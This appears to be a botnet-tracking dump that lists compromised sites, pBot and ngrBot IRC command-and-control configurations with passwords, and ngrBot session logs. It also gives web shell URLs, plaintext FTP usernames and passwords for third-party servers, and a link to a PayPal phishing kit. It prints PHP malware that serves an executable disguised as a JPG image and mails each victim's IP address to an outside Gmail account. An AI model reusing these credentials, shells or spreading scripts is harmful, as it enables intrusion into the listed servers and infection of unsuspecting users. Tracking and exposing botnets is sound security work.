Botnet - pBot - irc.setan.us

var $config = array("server"=>"irc.setan.us",
"port"=>"6667",
"pass"=>"",
"prefix"=>"|TiReX|","|MaChoo|","MaXoN|",
"maxrand"=>"7",
"chan"=>"#blocker",
"chan2"=>"#blocker",
"key"=>"bot",
"modes"=>"+ps",
"password"=>"on",
"trigger"=>".",
"hostauth"=>"110.111.112.113" // * for any hostname (remember: /setvhost takapusi.cok)
); 

Owned - ngrBot - unibell.com.pe

Owned - pBot - memex.mooo.com

// shell hxxp://britishherniasociety.org/wp-content/themes/twentyten/images/headers/xxx.php
("server"=>"memex.mooo.com",  
                     "port"=>"7150",   
                     "pass"=>"jancuk",   
                     "prefix"=>"endos",   
                     "maxrand"=>"3",   
                     "chan"=>"#+kpok", 
                     "chan2"=>"#+kpok",  
                     "key"=>"senhadocanal",      
                     "modes"=>"+p",              
                     "password"=>"jancuk",           
                     "trigger"=>".",  
                     "hostauth"=>"admin.unix-ccpower.com"

Owned - ngrBot - rockstar

199.193.252.177 5236 : PASS ROCKR
PRIVMSG #rockspread :[MSN]: Updated MSN spread interval to "5"
PRIVMSG #rockspread :[HTTP]: Updated HTTP spread interval to "5"
PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) - Redirected 24 domain(s)
NICK n{US|XPa}entvuwe
USER entvuwe 0 0 :entvuwe
JOIN #ROCK ngrBot
JOIN #rockspread
JOIN #US

Owned - pBot - Frank_73

Owned - rockstar - jagd-kamera.de

// irc server !!
elperro23.net (5236)
#rockspread
#ROCK

Owned - pBot - jaguari.rs.gov.br

Owned - ngrBot - elperro23.net

hxxp://www.virustotal.com/file-scan/report.html?id=3ca3ccdb973874d40a6a99a3bfaecab54efe55b50c1899ac9678c935e0c782e9-1324149377

PHP - pBot - FHI Crew

Owned - ngrBot - alemanarts.com

FTP - Stealer - ciesplimeira.org.br

Domain : ciesplimeira.org.br
IP : 199.238.129.34 
PORT : 21
USER : ciespl
PASS : hatuw+RUpr4dU4pu
// traffic on port 21 ->
| CWD etc/..PASS h
| atuw+RUpr4dU4pu.
| .TYPE I..SYST..C
| WD etc/..PASS ha
| tuw+RUpr4dU4pu..
| TYPE I..SYST..

Owned - Malware - okprice.biz & vivitenis.com

Owned - malware - jjpoultrys.com

Found a Paypal phishing script into that site here is the script :)
// usa.zip Paypal phishing !
hxxp://www.sendspace.com/file/k7kycq

Owned - Maware - newcarsnc.it

// malware info 
hxxp://vxvault.siri-urz.net/ViriFiche.php?ID=10462
hxxp://www.threatexpert.com/report.aspx?md5=9EB8326C223D9330BD8B3924F4D71476

Owned - Botnet - concertnomade.com

Session Ident: #!loco!
[14:03] * Now talking in #!loco!
[14:03] * Topic is '.m.s|.m.e fotoo :D http://www.concertnomade.com/templates/profiles.php?= '
[14:03] * Set by wd91 on Thu Dec 01 13:55:46
[14:07] * Disconnected

OWNED - Botnet - 208.67.252.82

Owned :P

// sample found here : 
hzzp://vxvault.siri-urz.net/ViriFiche.php?ID=10452

// spreading file profile.php?=
header('Content-disposition: attachment; filename=IMG886384737664934-JPG-www.facebook.com.exe');
header('Content-type: application/octet-stream');
readfile('qwe2');

Stealer - FTP - 199.238.129.124

IP : 199.238.129.124:21
USER : volun7
pass : amigo+10
// Shell 
hxxp://199.238.129.124/xxx.php

Owned - ngrBot - idhrix30 (HF)

63.223.79.122:5794 PASS ngrBot
NICK n{US|XPa}owsekei
USER owsekei 0 0 :owsekei
JOIN #chan ngrBot
JOIN #chanspread
PRIVMSG #chan :[DNS]: Blocked 0 domain(s) - Redirected 13 domain(s)

$ip = getenv("REMOTE_ADDR");
$content = "
-----------------------------------------------------
INFECTADO SPREAD rlzz ng . =)

Fecha: $Fecha / Hora: $Hora
Ip Host Victima: $ip
----------
xD
----------------------------------------------------- \n";

$correo1 = "idhrix30@gmail.com";
$subject = "INFECTADO SPREAD rlzz ng - $ip";
$from = "From:INFETADO SPREAD rlzz ng ";

 mail($correo1,$subject,$content,$from);
?>
html>head>
meta http-equiv="refresh" content="0; URL=IMG80593858.exe">
/head>